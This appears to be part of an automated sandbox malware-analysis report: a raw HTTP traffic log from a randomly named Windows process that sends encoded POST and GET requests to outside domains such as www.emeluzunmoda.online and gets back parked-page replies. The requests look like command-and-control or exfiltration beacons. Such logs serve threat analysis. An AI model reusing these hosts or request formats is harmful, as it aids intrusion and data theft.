                                                Aug 27, 2024 08:00:43.272984982 CEST1289OUTData Raw: 50 30 70 54 4f 6a 6b 78 53 2f 30 50 4f 69 65 76 47 41 49 32 41 46 57 55 72 53 2f 30 6a 43 73 32 5a 66 5a 62 55 76 34 44 44 2b 6a 4d 4a 4f 46 36 65 61 52 58 66 6b 34 36 6f 54 6a 4a 34 45 63 7a 36 64 4c 47 4e 47 6b 4f 67 65 54 2f 35 76 79 44 52 78
                                                Data Ascii: P0pTOjkxS/0POievGAI2AFWUrS/0jCs2ZfZbUv4DD+jMJOF6eaRXfk46oTjJ4Ecz6dLGNGkOgeT/5vyDRxuSADGMGnEB1aXx3Y9HUXrCRmEwdOzHoSSuScs3XJW4NPkdJqdqj2P9vsWIu1JzwH21RGHHX61tbawIWVQfEDIZQcftLJQ4FjqONkmvbwNBxDIgNuDMq4HSE9qtX3DPWcEOXOQkW/SHTYvrR3erd2BR9mZLeAla9gw
                                                Aug 27, 2024 08:00:43.273134947 CEST11601OUTData Raw: 5a 62 35 41 73 4e 31 70 52 43 6a 4f 74 6a 45 45 51 70 6c 39 67 36 36 69 6b 34 39 48 30 6a 37 64 71 7a 45 6e 73 75 39 61 4c 35 45 32 4b 32 73 42 45 6a 5a 77 67 59 63 66 62 6c 7a 38 66 66 36 67 50 4d 31 4d 38 63 32 63 4b 73 36 47 4b 49 39 2f 7a 6c
                                                Data Ascii: Zb5AsN1pRCjOtjEEQpl9g66ik49H0j7dqzEnsu9aL5E2K2sBEjZwgYcfblz8ff6gPM1M8c2cKs6GKI9/zlcQpRDFi0GbkyGrNSiE4qGPlQ607meiLTF/BU4LSkRKNsbelCTb8xpaYIJw0xGEgf1da5VEf9iYzo/GTyIEEcaGipVeDpk339OSfJf9fyGRvp1Fq5Ns6djB8oIDBa2sHhVyDi7wBP9OuZ/mWoxm96ekV9pQKrXMIZR
                                                Aug 27, 2024 08:00:43.373538017 CEST1289OUTData Raw: 58 76 5a 52 4f 51 7a 79 39 71 32 32 6e 6c 76 44 6e 57 34 58 6d 4e 72 50 36 62 39 58 47 38 68 71 2b 2b 43 43 50 56 42 49 75 7a 6d 63 51 74 4a 38 49 46 55 42 44 46 73 6d 4f 68 50 57 62 53 35 78 41 48 42 46 4c 7a 42 71 6d 65 41 2f 4e 58 58 66 4c 7a
                                                Data Ascii: XvZROQzy9q22nlvDnW4XmNrP6b9XG8hq++CCPVBIuzmcQtJ8IFUBDFsmOhPWbS5xAHBFLzBqmeA/NXXfLz57PjZSZDHjSIxjIbytVVsV3zSTFDRbnhkGl79pQLRk7XDrwTGnH0WVzuIKdNrqPHgZSnnJV5IYi9qagwxcEk3IiYl+zKgyND8b/vuj09WBrnN7dVB+8NuVfuBIsdFXxxMuEAjb+FWzGOrCCnJsVYvbxzBFyVEyjMX
                                                Aug 27, 2024 08:00:43.373744011 CEST9023OUTData Raw: 6c 38 57 37 73 56 61 4b 79 35 59 30 39 46 54 45 68 33 31 30 4f 46 39 42 78 67 52 55 4a 44 51 6a 6f 52 63 4d 41 63 70 65 73 4a 61 78 69 47 65 74 2b 66 53 77 7a 6f 53 47 2b 35 32 7a 38 5a 52 47 4d 66 67 61 46 32 53 50 6c 50 71 4c 31 45 67 2f 69 76
                                                Data Ascii: l8W7sVaKy5Y09FTEh310OF9BxgRUJDQjoRcMAcpesJaxiGet+fSwzoSG+52z8ZRGMfgaF2SPlPqL1Eg/ivQ57j/RwwBb7UGKhhDAw65kM8b7KLG1LFsAlY62xR3bQvhRqeGuUDaD6ZE6S4KClAgFFhpM51nB8W7hprX5/ujqJ3/0AlIdjiBonJpknBNQCdovA6dkVE4dsvuRqO3Y+dWy0MsAwBRkhFrJIctlncMO2a3aoUikjiK
                                                Aug 27, 2024 08:00:43.476402998 CEST1200INHTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:42 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1150
                                                x-request-id: fa03124e-82a9-4f3b-8143-960ab31e0484
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                set-cookie: parking_session=fa03124e-82a9-4f3b-8143-960ab31e0484; expires=Tue, 27 Aug 2024 06:15:43 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 55 4d 72 70 7a 53 30 4a 53 6f 33 6b 44 48 47 53 64 2f 78 69 37 31 52 44 66 6d 34 37 4d 2b 42 79 59 4f 71 6a 7a 6a 50 57 49 63 44 4f 53 71 78 46 6a 36 39 45 76 6e 4e 6e 69 55 52 46 79 7a 65 2b 65 61 57 55 39 58 72 4b 5a 6f 75 70 56 4b 58 55 45 30 53 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.11.2049881199.59.243.226807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:45.807940006 CEST555OUTGET /enra/?ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&wXB=brv4Erb HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:45.910274029 CEST1200INHTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:00:45 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1478
                                                x-request-id: 3b15f141-f93f-4847-8320-b14eefcb73b7
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZYk5tm00vBmFyaN7GKnAueCtyd0JwBkFi5U9ybVCjBAHH6HMDjDPavLM1ZxUAzU3/gHHtOqdEztGAqmelRMIw==
                                                set-cookie: parking_session=3b15f141-f93f-4847-8320-b14eefcb73b7; expires=Tue, 27 Aug 2024 06:15:45 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 5a 59 6b 35 74 6d 30 30 76 42 6d 46 79 61 4e 37 47 4b 6e 41 75 65 43 74 79 64 30 4a 77 42 6b 46 69 35 55 39 79 62 56 43 6a 42 41 48 48 36 48 4d 44 6a 44 50 61 76 4c 4d 31 5a 78 55 41 7a 55 33 2f 67 48 48 74 4f 71 64 45 7a 74 47 41 71 6d 65 6c 52 4d 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZYk5tm00vBmFyaN7GKnAueCtyd0JwBkFi5U9ybVCjBAHH6HMDjDPavLM1ZxUAzU3/gHHtOqdEztGAqmelRMIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 08:00:45.910377026 CEST967INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2IxNWYxNDEtZjkzZi00ODQ3LTgzMjAtYjE0ZWVmY2


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.11.204988285.159.66.93807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:51.599246979 CEST835OUTPOST /c0kl/ HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.emeluzunmoda.online
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.emeluzunmoda.online/c0kl/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 4e 7a 78 78 32 36 35 5a 71 44 48 79 70 50 50 35 43 34 66 36 4e 68 74 43 45 36 78 53 32 78 37 30 41 32 42 62 7a 4b 6d 36 31 59 73 53 35 76 4e 7a 78 68 31 42 77 64 47 2f 4e 76 50 44 4d 68 50 66 6d 65 35 4b 39 74 6c 6c 71 73 66 49 34 62 56 70 70 6b 38 34 6d 73 44 35 6f 42 7a 6d 53 62 56 6b 76 44 69 52 6f 75 4d 53 51 68 6e 43 6e 6e 78 6c 6b 73 5a 56 30 74 61 4e 34 6d 6b 4a 42 39 43 54 32 59 4a 76 47 74 34 31 47 49 4d 36 39 41 68 68 59 59 4d 37 4f 34 65 4a 5a 38 79 2b 49 70 36 74 30 32 76 53 47 63 50 4f 50 78 37 6b 51 66 2b 73 63 65 53 6b 4d 41 77 2b 2f 72 74 54 58 4f 5a 73 6a 67 3d 3d
                                                Data Ascii: ij60MtY=Nzxx265ZqDHypPP5C4f6NhtCE6xS2x70A2BbzKm61YsS5vNzxh1BwdG/NvPDMhPfme5K9tllqsfI4bVppk84msD5oBzmSbVkvDiRouMSQhnCnnxlksZV0taN4mkJB9CT2YJvGt41GIM69AhhYYM7O4eJZ8y+Ip6t02vSGcPOPx7kQf+sceSkMAw+/rtTXOZsjg==
                                                Aug 27, 2024 08:00:51.831715107 CEST225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:00:51 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-08-27T06:00:56.7231680Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.11.204988385.159.66.93807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:54.353516102 CEST1175OUTPOST /c0kl/ HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.emeluzunmoda.online
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.emeluzunmoda.online/c0kl/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 4e 7a 78 78 32 36 35 5a 71 44 48 79 6f 76 2f 35 41 66 4c 36 63 52 74 46 4b 61 78 53 35 52 37 77 41 32 46 62 7a 4c 53 51 31 72 59 53 35 4f 52 7a 77 67 31 42 7a 64 47 2f 46 50 50 4d 49 68 50 49 6d 5a 78 30 39 6f 64 6c 71 73 4c 49 2b 73 56 70 67 30 38 2f 75 4d 44 2b 74 78 7a 72 5a 37 56 55 76 44 76 34 6f 71 45 53 51 77 37 43 6d 6c 5a 6c 31 70 74 53 77 4e 61 50 77 47 6b 4b 59 74 43 4a 32 5a 31 52 47 70 30 44 46 36 51 36 39 6a 70 68 5a 59 4d 36 63 6f 66 42 45 73 7a 77 4a 70 6a 61 37 53 54 50 47 2b 61 56 4c 78 76 6e 4d 75 72 75 55 38 71 6b 53 7a 6f 73 78 4b 41 76 54 61 46 70 77 70 44 52 58 50 2f 57 6e 75 31 51 71 43 2f 38 30 69 2f 62 44 78 72 69 43 6b 67 6b 2b 63 42 39 78 45 6b 33 31 54 38 51 57 52 4e 4e 66 6d 61 65 43 6f 78 44 6e 6d 37 2b 44 7a 53 32 66 64 59 33 68 34 58 61 6f 6a 32 47 53 4d 4f 73 4f 39 52 46 41 4e 45 57 68 70 4c 4f 4d 76 7a 70 32 65 53 6b 65 74 74 47 45 66 54 4f 31 69 35 6e 45 53 64 5a 49 74 44 77 41 42 48 72 71 44 62 68 53 2f 4d 35 59 77 77 76 76 73 52 43 2b 47 [TRUNCATED]
                                                Data Ascii: ij60MtY=Nzxx265ZqDHyov/5AfL6cRtFKaxS5R7wA2FbzLSQ1rYS5ORzwg1BzdG/FPPMIhPImZx09odlqsLI+sVpg08/uMD+txzrZ7VUvDv4oqESQw7CmlZl1ptSwNaPwGkKYtCJ2Z1RGp0DF6Q69jphZYM6cofBEszwJpja7STPG+aVLxvnMuruU8qkSzosxKAvTaFpwpDRXP/Wnu1QqC/80i/bDxriCkgk+cB9xEk31T8QWRNNfmaeCoxDnm7+DzS2fdY3h4Xaoj2GSMOsO9RFANEWhpLOMvzp2eSkettGEfTO1i5nESdZItDwABHrqDbhS/M5YwwvvsRC+GY1vsJPQ2lm/axrhDcNO11jjmQujgMdvKON71zoTPtPeXfDpbdfPtnuRIiQi31eQIr4d7L0RC8nOLKpCQmJNVMFzT1QNjKTsTh6molTNqJESn/sT6ckN+jkdIaifElwXi0tJh9lRavnSUgG0r/KMYq3dDv+oTIDuwJMooLdJgpmNcG0s2SjmnzMKZH8tck+d9Moqktvr0d2vvw=
                                                Aug 27, 2024 08:00:54.578942060 CEST225INHTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:00:54 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 18
                                                X-Rate-Limit-Reset: 2024-08-27T06:00:56.7231680Z


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.11.204988485.159.66.93807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:57.111351013 CEST2578OUTPOST /c0kl/ HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.emeluzunmoda.online
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.emeluzunmoda.online/c0kl/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 4e 7a 78 78 32 36 35 5a 71 44 48 79 6f 76 2f 35 41 66 4c 36 63 52 74 46 4b 61 78 53 35 52 37 77 41 32 46 62 7a 4c 53 51 31 72 41 53 34 38 31 7a 77 44 64 42 79 64 47 2f 50 76 50 50 49 68 50 4a 6d 66 5a 4f 39 6f 68 66 71 76 7a 49 35 2f 64 70 68 42 51 2f 72 4d 44 2f 69 52 7a 70 53 62 56 41 76 44 6a 73 6f 71 35 76 51 68 2f 43 6e 69 31 6c 6a 4f 42 56 76 74 61 4e 77 47 6b 57 63 74 43 76 32 59 41 4b 47 70 77 44 46 34 6b 36 38 57 74 68 62 50 51 36 62 34 66 41 4e 4d 7a 72 48 4a 69 67 37 54 7a 39 47 2b 62 69 4c 79 6a 6e 4d 73 54 75 54 39 71 6e 53 54 6f 73 38 71 41 73 42 71 42 6c 77 74 69 53 58 50 62 57 6e 70 78 51 73 69 2f 38 78 48 54 63 55 68 72 73 47 6b 68 6b 36 63 39 6c 78 46 41 4a 31 53 6f 51 57 68 5a 4e 51 78 36 65 41 4b 4a 44 74 6d 37 38 4e 54 54 6f 4a 74 59 64 68 34 47 78 6f 69 57 57 53 4f 43 73 50 64 78 46 45 5a 59 56 33 35 4c 4d 53 2f 7a 6e 79 65 4f 67 65 74 63 45 45 66 54 65 31 6a 4e 6e 45 43 74 5a 4a 73 44 78 47 52 48 67 78 7a 62 30 4c 50 51 7a 59 30 59 5a 76 76 41 4a 2b 46 [TRUNCATED]
                                                Data Ascii: ij60MtY=Nzxx265ZqDHyov/5AfL6cRtFKaxS5R7wA2FbzLSQ1rAS481zwDdBydG/PvPPIhPJmfZO9ohfqvzI5/dphBQ/rMD/iRzpSbVAvDjsoq5vQh/Cni1ljOBVvtaNwGkWctCv2YAKGpwDF4k68WthbPQ6b4fANMzrHJig7Tz9G+biLyjnMsTuT9qnSTos8qAsBqBlwtiSXPbWnpxQsi/8xHTcUhrsGkhk6c9lxFAJ1SoQWhZNQx6eAKJDtm78NTToJtYdh4GxoiWWSOCsPdxFEZYV35LMS/znyeOgetcEEfTe1jNnECtZJsDxGRHgxzb0LPQzY0YZvvAJ+FU1uMJPb19lxqxStjcAK11wjmMyjhZms6yN7FDoWftMInffvrdZe9nuRIuEi35eQdP4cJT0BlgnBrKvCQmYNVBxzTN+Nja5sVZ6n5VTDLJHXX/pYad+DevKdIG6fE1KUVMtKgNlGqvoU0gNjb+RIYnodDDuoTQpuzJMos6VSzI4TcSig2SdyXSbJ7H+gtFeXI550Udn2kBhxpVRF5/1XzxuelVeoaAps1MzIXUy1+GLHL+gQPOrFxvsQP5Z68UMf6ti7t46lL7tBjKUgUwnq6XNs0m8PGpcn+wbdjHXndLTI2CauqltGtVw7tkVa/w8cJqapmsCMOlo465PngDs7aWRRSoGNUswk5fLxI4OUu4dgeyh64M1CVAcpM3Kqw1E+yffb7pIt7JInv2/2xwAW0mgG6Nl/M1MvcY5KtNsi4FsCRlnA8IfunUCiJ+gO8Jy+cyvbFEMURmfETMCTDh6VdxnjTo0MJflKjPcPtC3pFCgw6TE5QaRECoiu3DudQ2f284NnZv2Oj6b75PEGwp65MZhFQlvic74kUuxf2DPKIySXDqsBsHrwVcTPFDlLlxV50201BWikgkup1i5W0p5adwvPCJR+4BqRYHii93kQFWJL4IGnZPz4ZrbmMea5CgbTqoddNQ6gJE5YeBUbBDzyJORNQVqzpaW1kww [TRUNCATED]
                                                Aug 27, 2024 08:00:57.111437082 CEST10312OUTData Raw: 4e 33 66 50 30 67 76 4a 74 55 62 4b 51 43 74 64 30 61 75 5a 78 49 48 53 4e 78 43 76 34 55 76 69 37 31 70 53 64 6e 4c 72 76 56 74 43 41 54 51 4c 56 39 4d 4c 34 50 44 76 79 6c 73 77 4b 6d 67 4e 6b 2b 6d 7a 51 38 68 47 47 50 4b 68 7a 64 54 78 6c 57
                                                Data Ascii: N3fP0gvJtUbKQCtd0auZxIHSNxCv4Uvi71pSdnLrvVtCATQLV9ML4PDvylswKmgNk+mzQ8hGGPKhzdTxlWi9ObVs0sQJ4Bk/JOyFh0/914YCn79yS2Pbe0K/7xCfRiZ+BCEIiJoY9h9jJB4McrJtydEzxFB1ee0s+tQmujp6xZzXdM1PjzF+3lQ6aYdd9fR1G3SyLdpyL3Yhnowu6zQEk9Gy8vwZ051jbj5zDNAwfcykhCmcN3j
                                                Aug 27, 2024 08:00:57.342683077 CEST2578OUTData Raw: 64 62 62 41 49 4d 62 2b 55 59 2b 57 48 75 72 4f 32 38 41 75 6e 49 51 50 70 30 72 79 4b 44 68 50 44 76 37 6f 30 78 68 71 55 42 70 2b 4f 5a 55 35 5a 30 76 43 49 46 64 6d 57 6c 76 76 2b 73 6a 61 6e 42 4f 6a 67 57 30 56 43 36 4c 47 6b 36 54 4f 4c 38
                                                Data Ascii: dbbAIMb+UY+WHurO28AunIQPp0ryKDhPDv7o0xhqUBp+OZU5Z0vCIFdmWlvv+sjanBOjgW0VC6LGk6TOL8cZqCNdblX83Ba8fc3Bui0VbGQF+7I2a5TIn2mLwCSkwmooPA/9HZ1GU+aWkFHYEsPV5NCrxQxTBAqdV2lA3+x3vfionr+InkLSYqsAY4wjhf9VrCMIQVP2uipz84SUblCYR0x6ywrqO/oVM3yKFMUDbeqJ7hYjVcm
                                                Aug 27, 2024 08:00:57.342860937 CEST5156OUTData Raw: 69 69 41 4f 4d 63 4a 2b 68 37 53 48 6c 55 44 66 50 62 6d 39 6e 62 6f 70 77 6a 6b 33 49 48 6b 79 57 4e 30 6e 38 73 4e 5a 72 32 37 50 72 74 5a 6f 66 65 49 48 78 32 41 47 4f 6a 6d 35 45 66 44 78 46 36 6d 76 63 41 34 71 47 71 61 6a 68 76 30 52 42 4d
                                                Data Ascii: iiAOMcJ+h7SHlUDfPbm9nbopwjk3IHkyWN0n8sNZr27PrtZofeIHx2AGOjm5EfDxF6mvcA4qGqajhv0RBMj7pSSKokU6EVe8/oslw3MvVlTq70EedH8yUOWpprvFpDdtb/W+jyjSOqrQ9L+HyC+ISYrgqlHYGN+EbZYh5iCQzSdKB0VPQaheJHQX9l8JCnwmLZGCfoZjpxYbA1cCxKBpWcdNx1fnWitbUS90k8eut3S3z+yfHtE
                                                Aug 27, 2024 08:00:57.343019962 CEST7734OUTData Raw: 49 44 6d 59 61 34 6a 36 63 43 6a 72 71 65 69 4f 63 79 71 5a 35 51 58 71 70 36 6a 4c 5a 66 75 36 62 47 43 55 70 55 6e 78 4e 38 43 78 4f 6e 50 79 51 32 53 56 34 4f 31 68 53 61 6b 46 61 70 6d 34 6e 72 6d 6a 79 6e 53 46 61 55 68 45 6f 63 59 79 6e 57
                                                Data Ascii: IDmYa4j6cCjrqeiOcyqZ5QXqp6jLZfu6bGCUpUnxN8CxOnPyQ2SV4O1hSakFapm4nrmjynSFaUhEocYynWslLVzbvobmo25yX7nOE+2PZYgKUbLEg/U/5sewFh9/D6HjnqCFBzT0NIEZDU6yq2uC5OGTYaflom8eT/VoQz9TheTboNwzLppK3uMimh5pthNSL9yV3dreyXI8qex2PxLr0YBb5KEHsifQcUaLqQo4VGwck22NJcS
                                                Aug 27, 2024 08:00:57.343172073 CEST10312OUTData Raw: 47 77 69 36 7a 2b 43 74 55 30 6d 69 53 5a 72 33 2b 4f 58 79 38 4b 6c 45 39 6e 56 71 77 48 51 6e 45 54 59 45 68 6c 6d 75 68 77 30 30 30 37 53 43 4c 66 41 56 30 63 2f 64 67 41 33 49 47 53 52 51 64 45 63 47 2f 48 70 61 38 76 39 44 56 57 4e 6a 76 70
                                                Data Ascii: Gwi6z+CtU0miSZr3+OXy8KlE9nVqwHQnETYEhlmuhw0007SCLfAV0c/dgA3IGSRQdEcG/Hpa8v9DVWNjvpYFqKT3iLzWsMB4SDTV+cLgMAnaMLdfyGZ8pGGN7ca1xPqI6LuWJtE5bzu8Cee0F4YZ5jrB/7mCkm3nH/Ds72d6UQnliGTYGjPfp+c2YitjEla/nNzwZyk2kR1RRatbPcpIhFb++IxzDqO4Tcx/5cpv9sG70EC/drC
                                                Aug 27, 2024 08:00:57.573977947 CEST2578OUTData Raw: 70 72 4a 6f 79 47 45 36 63 62 4a 69 6a 2b 41 45 76 35 56 62 7a 36 53 49 52 72 39 42 79 5a 73 33 30 31 37 36 52 50 73 54 75 67 67 75 52 77 7a 46 35 65 78 39 39 57 6e 4e 35 78 74 59 67 32 2b 32 6b 48 6d 56 77 74 6a 5a 56 4a 67 38 68 2f 35 2f 4c 31
                                                Data Ascii: prJoyGE6cbJij+AEv5Vbz6SIRr9ByZs30176RPsTugguRwzF5ex99WnN5xtYg2+2kHmVwtjZVJg8h/5/L1MT6u/9fvXVHwqu6Mw7Z74n6WhVNAUVrQ6CcZkCZ4LIWKBYw7c0Xp5LjpJWrigfL0dTkp9zT5TUL3zn0gxOR++c9iLsT5i6UrpKD4VAPwQpnTCOXvHMmpESKEEcYVvv2HAiIRLZrXzL8haFytTEdYn5ji3TD9qbCW+
                                                Aug 27, 2024 08:00:57.574140072 CEST1289OUTData Raw: 2b 69 6b 4b 39 61 77 63 58 30 78 39 36 34 52 44 63 42 30 68 67 2b 6d 6f 46 6d 55 6f 33 62 35 63 6c 38 41 39 71 42 49 6e 45 76 4c 59 50 30 74 59 43 75 65 48 55 56 6b 75 77 61 67 73 65 32 6c 52 59 6e 36 58 69 48 67 59 67 64 34 78 64 6a 34 34 56 48
